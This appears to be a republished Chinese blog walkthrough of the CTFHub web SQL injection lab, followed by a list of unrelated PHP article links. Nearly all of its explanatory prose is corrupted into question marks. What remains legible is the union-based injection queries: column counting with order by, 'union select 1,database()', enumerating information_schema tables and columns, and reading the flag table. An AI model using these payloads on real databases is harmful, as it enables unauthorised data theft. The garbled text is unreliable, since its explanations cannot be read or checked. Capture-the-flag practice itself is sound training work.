CTFHub技能树web-sql注入

阅读量：294 次

发布时间：2019-03-01

本文共 1499 字，大约阅读时间需要 4 分钟。

???????????????????

??????????

??????????????????????????????????????SQL?????????????select * from news where id=1 order by 1???????????????????????????

????SELECT??????

?????????????????????SQL???select * from news where id=1 and 1=2 union select 1,database()

??????union?????????database()??????????????????????????????

????????????????

????????????????group_concat????columns??????????????????????????select * from news where id=1 and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_name='flag'

??????????????????????????

??????????????

????????????information_schema????????????????????????????????????select * from information_schema.tables where table_schema='sqli'

???group_concat??????????????????????????

????`union`?????

union????????????????????????SELECT???????????????????????????????????select * from news where id=1 and 1=2 union select 1,database()

???????????

??????????????????SQL???select * from information_schema.databases

????????????????????????????????

?????????????

?????????????????????select count(*) from information_schema.tables where table_schema='sqli'

??????????????????????

?????????????

???????????????????????select table_name from information_schema.tables where table_schema='sqli'

????????????????????

???????????????

?????????????????select column_name from information_schema.columns where table_name='flag'

?????????????

?????????????????

???????????????????????select * from sqli.flag

????????????????????????????????

转载地址：http://zhlx.baihongyu.com/

你可能感兴趣的文章

php 数据库表格数据,php数据库到excel表格-php怎么把数据库数据放到表格里

PHP 数据库连接池实现

php 数组区别,PHP中数组的区别

PHP 数组怎么添加一个元素

PHP 文件上传

PHP 文件操作

php 文字弹幕效果代码,HTML5文字弹幕效果

php 时间日期函数，获取今天开始时间，结束时间

PHP 构造函数的重载

php 标准规范

PHP 浮点型精度运算相关问题

php 浮点型计算精度问题

php 特定时间段统计,jpgraph某个时间段的数据统计

php 生成csv mac下乱码

php 生成证书签名及验签

php 的rsa加密与解密

PHP 的标准输入与输出

php 笔记（早前的，很乱）

Redis使用量暴增，快速定位有哪些大key在作怪